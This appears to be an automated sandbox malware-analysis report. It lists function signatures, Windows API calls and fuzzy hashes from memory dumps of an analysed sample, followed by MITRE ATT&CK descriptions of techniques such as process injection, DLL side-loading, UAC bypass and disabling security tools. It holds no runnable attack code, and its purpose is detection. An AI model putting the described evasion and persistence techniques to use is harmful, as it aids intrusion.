Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: ExclusiveLock$AcquireRelease
String ID: ,\m
API String ID: 17069307-3333556434
Opcode ID: 055c7a5b07926a580c44ef13361e82e6dbaef2a6471189fa280434a599e9eb30
Instruction ID: 9e84f37bea89a8c341f1ca9b6101168fda229e039a8de479933f39888f900f26
Opcode Fuzzy Hash: 055c7a5b07926a580c44ef13361e82e6dbaef2a6471189fa280434a599e9eb30
Instruction Fuzzy Hash: 6DE0DF31847E1897CB2EAFD6840575A3BB8EE436A0302804EE40D67D01CB3194408687

Function 6D55BED0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15librarythreadCOMMON

Download Yara Rule

APIs

DisableThreadLibraryCalls.KERNEL32(?), ref: 6D55BEE3
LoadLibraryExW.KERNEL32(cryptbase.dll,00000000,00000800), ref: 6D55BEF5

Strings

cryptbase.dll, xrefs: 6D55BEF0

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: Library$CallsDisableLoadThread
String ID: cryptbase.dll
API String ID: 4137859361-1262567842
Opcode ID: ffbb0678cd8380d001f442a6e421e78ab921bbb69d9663ec01ec992b7f5f5dba
Instruction ID: 083ae8acc9a014742162ec83467ea0acc5ca5dbe6fc1439c036ead9731478c22
Opcode Fuzzy Hash: ffbb0678cd8380d001f442a6e421e78ab921bbb69d9663ec01ec992b7f5f5dba
Instruction Fuzzy Hash: F3D0A731080508EBCF06BA908C09F253774A701711F00C029F30544D51C7B1A430CB47

Function 6D5808F0 Relevance: 5.2, APIs: 4, Instructions: 165COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6D5CE7DC), ref: 6D580918
LeaveCriticalSection.KERNEL32(6D5CE7DC), ref: 6D5809A6
EnterCriticalSection.KERNEL32(6D5CE7DC,?,00000000), ref: 6D5809F3
LeaveCriticalSection.KERNEL32(6D5CE7DC), ref: 6D580ACB

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 43241e0c95e8def4217f1423a06379583a0f78c44ccd6ffe2c51e1b73fcb9a3b
Instruction ID: 4eee8ee2ce12cc0095214d9c91400a4e12725179d50ca18977e878056c8b0839
Opcode Fuzzy Hash: 43241e0c95e8def4217f1423a06379583a0f78c44ccd6ffe2c51e1b73fcb9a3b
Instruction Fuzzy Hash: 2F51F9367129618BEF1C9A5EC44573933B5EBC2B20B26893ED965D7F82DB30EC418781

Function 6D598E00 Relevance: 5.1, APIs: 4, Instructions: 147COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,?,6D58B58D,?,?,?,?,?,?,?,6D5BD734,?,?,?,6D5BD734), ref: 6D598E6E
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6D58B58D,?,?,?,?,?,?,?,6D5BD734,?,?,?,6D5BD734), ref: 6D598EBF
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6D58B58D,?,?,?,?,?,?,?,6D5BD734,?,?,?,6D5BD734), ref: 6D598F46
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6D58B58D,?,?,?,?,?,?,?,6D5BD734,?,?,?), ref: 6D598F8F

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: malloc$free
String ID:
API String ID: 1480856625-0
Opcode ID: 82ed1e9097a3afb2f9720a58d321264ffdd2bc64ca70458b0fa2a45d47c1f40f
Instruction ID: 2a23cd1ea3b200795a063614f44c66bce2287fa1695151baf2e91a42c2f5e63e
Opcode Fuzzy Hash: 82ed1e9097a3afb2f9720a58d321264ffdd2bc64ca70458b0fa2a45d47c1f40f
Instruction Fuzzy Hash: 9A519DB1A006568FEB18CF64D88076EBBB6FF44314F150869D916ABB44E731FD05CBA2

Function 6D59B5C0 Relevance: 5.1, APIs: 4, Instructions: 145COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,6D59B2C9,?,?,?,6D59B127,?,?,?,?,?,?,?,?,?,6D59AE52), ref: 6D59B628
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6D59B2C9,?,?,?,6D59B127,?,?,?,?,?,?,?,?,?,6D59AE52), ref: 6D59B67D
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6D59B2C9,?,?,?,6D59B127,?,?,?,?,?,?,?,?,?,6D59AE52), ref: 6D59B708
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,6D59B127,?,?,?,?,?,?,?,?), ref: 6D59B74D

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: malloc$free
String ID:
API String ID: 1480856625-0
Opcode ID: 8c37b7cb337ed9c711dd55782e24ed8f8109b11815dbe85c2816f66635ef6d97
Instruction ID: 429e1f79e24b44561743efe0e36e4c9c3848f4c45c2044c81893ccf129ff21a6
Opcode Fuzzy Hash: 8c37b7cb337ed9c711dd55782e24ed8f8109b11815dbe85c2816f66635ef6d97
Instruction Fuzzy Hash: 8151C071A04256CFEB18DF58C9C076EB7B5FF85305F058A2DD85AAB700DB30A804CBA1

Function 6D5927E0 Relevance: 5.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,6D592620,?,?,?,6D5860AA,6D585FCB,6D5879A3), ref: 6D59284D
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6D592620,?,?,?,6D5860AA,6D585FCB,6D5879A3), ref: 6D59289A
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6D592620,?,?,?,6D5860AA,6D585FCB,6D5879A3), ref: 6D592910
free.API-MS-WIN-CRT-HEAP-L1-1-0(00200000,?,?,6D592620,?,?,?,6D5860AA,6D585FCB,6D5879A3), ref: 6D59294E

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: malloc$free
String ID:
API String ID: 1480856625-0
Opcode ID: d2de7e1ff7bdc31c472ba7752dfa8e70318dc27e04c0c90cce38d4c2490f763d
Instruction ID: 72daf6acb5202352376f21c216f57f195acf97dfd5e1df55707675cecb0d49ce
Opcode Fuzzy Hash: d2de7e1ff7bdc31c472ba7752dfa8e70318dc27e04c0c90cce38d4c2490f763d
Instruction Fuzzy Hash: 0041BDB1A003468FEB28CF68D88076E73FABB45304F554839D556EBB40E731E944CBA2

Function 6D59DF90 Relevance: 5.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,6D58FF2A), ref: 6D59DFFD
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6D58FF2A), ref: 6D59E04A
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6D58FF2A), ref: 6D59E0C0
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,6D58FF2A), ref: 6D59E0FE

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: malloc$free
String ID:
API String ID: 1480856625-0
Opcode ID: 90cce3e48eef0da2fe099edab4a619916c2d562389920bdf1d019d0cc3cb7ce8
Instruction ID: 9cf156d659ca3e422f412196bf4229a3762f5134c48e3c6bc2e9bf42c2dfa6b9
Opcode Fuzzy Hash: 90cce3e48eef0da2fe099edab4a619916c2d562389920bdf1d019d0cc3cb7ce8
Instruction Fuzzy Hash: B341CDB1605286CFEB18CF68C88036A77B6BB46305F15492DD616EFB40E732E904CB92

Function 6D5A6180 Relevance: 5.1, APIs: 4, Instructions: 107COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000024), ref: 6D5A61DD
memcpy.VCRUNTIME140(00000000,00000024,-00000070), ref: 6D5A622C
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6D5A6250
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6D5A6292

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: malloc$freememcpy
String ID:
API String ID: 4259248891-0
Opcode ID: 5893c34d7f3bf4dedf17107e54c7f4d95b9b7aae97ebac19b20040b12d9879cd
Instruction ID: 5d6ac7561b590e603302b77f8e133c96f3f2efed66d4bb182c4546ac529d226b
Opcode Fuzzy Hash: 5893c34d7f3bf4dedf17107e54c7f4d95b9b7aae97ebac19b20040b12d9879cd
Instruction Fuzzy Hash: 0931E171A00A1A8FDB08CF2CD880ABE73E9FF95304F158539C55AD7651EB31E598CBA0

Function 6D596E50 Relevance: 5.1, APIs: 4, Instructions: 106COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000018), ref: 6D596EAB
memcpy.VCRUNTIME140(00000000,00000018,-000000A0), ref: 6D596EFA
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6D596F1E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6D596F5C

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: malloc$freememcpy
String ID:
API String ID: 4259248891-0
Opcode ID: f79b0d1840c2369f4eec79d8e40e2df460405132464b5032e37b6f575951a87d
Instruction ID: a70f543942ced2e30a5cc858b625fd750f47f7820b53e174cd7a02289c5a7082
Opcode Fuzzy Hash: f79b0d1840c2369f4eec79d8e40e2df460405132464b5032e37b6f575951a87d
Instruction Fuzzy Hash: 0F31D271A0060A8FDB08CF2CC9806BE73E9AB84340F51853DD41ADB659EB31E65987D1

Function 6D5AB580 Relevance: 5.1, APIs: 4, Instructions: 102COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,6D550A4D), ref: 6D5AB5EA
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000020,?,6D550A4D), ref: 6D5AB623
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6D550A4D), ref: 6D5AB66C
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000002,?,?,6D550A4D), ref: 6D5AB67F

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: malloc$free
String ID:
API String ID: 1480856625-0
Opcode ID: 24505f7248bafe57bfc3799e53e6668829a8bd5b20668a503b9c141c1f679121
Instruction ID: 75b2683bb8c6228ab84fe77aa2031bdb209d327128202d5f1d01fed7c830cdd4
Opcode Fuzzy Hash: 24505f7248bafe57bfc3799e53e6668829a8bd5b20668a503b9c141c1f679121
Instruction Fuzzy Hash: 3631C67190022A8FDB14DF58C84466EBBF6FF81315F1A8969C826AB701DB31E915CBE1

Function 6D57F5A0 Relevance: 5.1, APIs: 4, Instructions: 88COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00010000), ref: 6D57F611
memcpy.VCRUNTIME140(?,?,?), ref: 6D57F623
memcpy.VCRUNTIME140(?,?,00010000), ref: 6D57F652
memcpy.VCRUNTIME140(?,?,?), ref: 6D57F668

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
Instruction ID: 1ed1d412e6e38bfd95dfe701187cf0718d9617be5e1e415980b3143be03a2271
Opcode Fuzzy Hash: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
Instruction Fuzzy Hash: DE313E71A04214AFC728CF6DCCD0AAE77B5EBC4354B248939EA498BB04D731E9448B94

Function 6D54B7A0 Relevance: 5.1, APIs: 4, Instructions: 77COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 6D54B808
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 6D54B82C
memcpy.VCRUNTIME140(00000000,?,?), ref: 6D54B840
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6D54B849

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: free$mallocmemcpy
String ID:
API String ID: 3401966785-0
Opcode ID: ada4b8f96e00ecdc7e5dcfa71a85cedb3197fc872f510e91bce3b6840c2e3413
Instruction ID: 292b0510ee090cf5516ab602bdf5705c0d56a9a94f87588dc65df6fb389f455d
Opcode Fuzzy Hash: ada4b8f96e00ecdc7e5dcfa71a85cedb3197fc872f510e91bce3b6840c2e3413
Instruction Fuzzy Hash: 8A213BB0D002099FDF08DFA9C8856BEBBB4EF49314F158529ED06A7741E731A944CBA1

Function 6D55B940 Relevance: 5.1, APIs: 4, Instructions: 64COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,?), ref: 6D55B96F
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000020), ref: 6D55B99A
memcpy.VCRUNTIME140(00000000,?,?), ref: 6D55B9B0
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6D55B9B9

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: memcpy$freemalloc
String ID:
API String ID: 3313557100-0
Opcode ID: 58c68f052ebe1c42108df59d1a3e1378fb54e3b31cf75e40217e3a8b4e78de58
Instruction ID: 00f277c6922c4eddba6eb77d2d54f8bae379169aedefe9bd612c2d81df3b5b5c
Opcode Fuzzy Hash: 58c68f052ebe1c42108df59d1a3e1378fb54e3b31cf75e40217e3a8b4e78de58
Instruction Fuzzy Hash: 62114FB1E002059FCB04DF69D8849AFB7F8BF99214B14893AE919D3701D731A9158AA1

Function 61EAFEE0 Relevance: 5.0, APIs: 4, Instructions: 39COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 61EAFEEE
TlsGetValue.KERNEL32 ref: 61EAFF15
GetLastError.KERNEL32 ref: 61EAFF1C
LeaveCriticalSection.KERNEL32 ref: 61EAFF3C

Memory Dump Source

Source File: 00000009.00000002.3697149386.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000009.00000002.3695997989.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697489419.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697572051.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697726963.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697822264.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3698534601.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_61e00000_6523f73121.jbxd

Similarity

API ID: CriticalSection$EnterErrorLastLeaveValue
String ID:
API String ID: 682475483-0
Opcode ID: a187a0561b15ac659cc27c31303386dc53fb4f2523cc2de19bd987d58d59314a
Instruction ID: 3c942bbf6517c0ec0331f125ad054bd991ea38a51cb55fe1ac34f487ea1a944f
Opcode Fuzzy Hash: a187a0561b15ac659cc27c31303386dc53fb4f2523cc2de19bd987d58d59314a
Instruction Fuzzy Hash: C0F081B6A016008FDB00BFB9A98951A7BA8EB46A44B19416CD9548B309D730E885CBE3

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Process: OS API Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

